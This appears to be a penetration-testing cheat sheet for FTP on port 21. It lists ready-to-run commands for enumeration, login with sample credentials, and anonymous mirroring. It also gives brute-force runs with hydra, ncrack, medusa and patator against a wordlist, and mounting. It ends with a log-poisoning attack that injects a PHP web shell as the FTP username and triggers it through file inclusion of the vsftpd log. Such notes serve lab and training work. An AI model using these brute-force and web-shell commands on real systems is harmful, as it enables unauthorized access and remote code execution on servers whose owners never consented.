21 - FTP
Information
Default Port: 21
PORT STATE SERVICE
21/tcp open ftp
Enumeration
nc -vn 192.168.1.2 21
timeout 0.1 bash -c "nc -nv 192.168.1.2 21"
nmap -p21 -sS 192.168.1.2
nmap -p21 -sVC 192.168.1.2
nmap -p21 --script "ftp-anon" 192.168.1.2
nmap -p21 --script "ftp-*" 192.168.1.2
# ftps
openssl s_client -connect 192.168.1.2:21
openssl s_client -connect 192.168.1.2:21 -starttls ftp
Connect
ftp 192.168.1.2 # default port
ftp 192.168.1.2 1234 # other port
ftp anonymous@192.168.1.2 # one liner
lftp -u anonymous, 192.168.1.2 # default port
lftp -u ftpadmin,pass1234 192.168.1.2
lftp -u ftpadmin,'B0ss_B!TcH' 192.168.1.2
lftp -u ftpadmin,pass1234 192.168.1.2 -p 1234 # other port
lftp -u ftpadmin,pass1234 192.168.1.2 # ftps
lftp :~> ls
ls: Fatal error: Certificate verification: Not trusted
lftp :~> set ssl:verify-certificate false
ncftp -u peter -p 'Passw0rd' 192.168.1.2 # default port
ncftp -u peter -p 'Passw0rd' -P 1234 192.168.1.2 # other port
Usage
lpwd # local directory
pwd # remote directory
put <FILE> # upload file
mput * # upload all files
get <FILE> # download file
prompt off
mget * # downlaod all files
binary # activate binary mode
bye
ftp> rename cmd.php # rename file (cmd.php > cmd.php5)
(to-name) cmd.php5
ftp> less .htaccess # read files from FTP
ftp> more .htaccess
Error (Passive Mode)
❯ ftp 192.168.235.56
Connected to 192.168.235.56.
220 (vsFTPd 3.0.3)
Name (192.168.235.56:kali): admin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||17214|)
ftp> passive off
Passive mode: off; fallback to active mode: off.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x 2 1001 0 4096 May 26 2020 contactform
drwxr-xr-x 2 1001 0 4096 May 26 2020 css
drwxr-xr-x 3 1001 0 4096 May 26 2020 img
-rw-r--r-- 1 1001 0 23364 May 27 2020 index.php
drwxr-xr-x 2 1001 0 4096 May 26 2020 js
drwxr-xr-x 11 1001 0 4096 May 26 2020 lib
226 Directory send OK.
Brute Force
FTP
hydra -t 64 -l ftpuser -P rockyou.txt ftp://192.168.1.2 -f -I
hydra -t 64 -l ftpuser -P rockyou.txt ftp://192.168.1.2:1234 -f -I
hydra -C ftp-betterdefaultpasslist.txt ftp://192.168.1.2
ncrack -v -f --user ftp_s3cr3t -P rockyou.txt ftp://192.168.1.2
ncrack -v -f --user ftp_s3cr3t -P rockyou.txt ftp://192.168.1.2:1234
medusa -h 192.168.1.2 -u peter -P rockyou.txt -M ftp -v 4 -f
medusa -h 192.168.1.2 -u peter -P rockyou.txt -t 10 -M ftp -v 4 -f
medusa -h 192.168.1.2 -u peter -P rockyou.txt -t 10 -M ftp -v 4 -f 2>/dev/null
patator ftp_login host=192.168.1.2 user=admin password=FILE0 0=rockyou.txt -x ignore:code=530
patator ftp_login host=192.168.1.2 port=1234 user=admin password=FILE0 0=rockyou.txt -x ignore:code=530
FTPS
hydra -t 64 -l ftpuser -P rockyou.txt ftps://192.168.1.2 -f -I
Download
wget -r ftp://anonymous:none@192.168.1.2
wget -m ftp://anonymous:anonymous@192.168.1.2
wget -m --no-passive ftp://anonymous:anonymous@192.168.1.2 # [Error PASV]
wget -r --no-passive --no-parent ftp://anonymous:none@192.168.1.2 # [Error PASV]
Mount
# apt-get install -y curlftpfs
mkdir /mnt/ftp
curlftpfs 192.168.1.2 /mnt/ftp -o user=ftpadmin:'pass123'
umount /mnt/ftp
Files
/etc/vsftpd.conf # config file
/var/log/vsftpd.log # log file
/srv/ftp # default folder
Log Poisoning
lftp -u '<?php system($_GET["cmd"]); ?>', 192.168.1.2
http://192.168.1.2/file.php?file=/var/log/vsftpd.log&cmd=id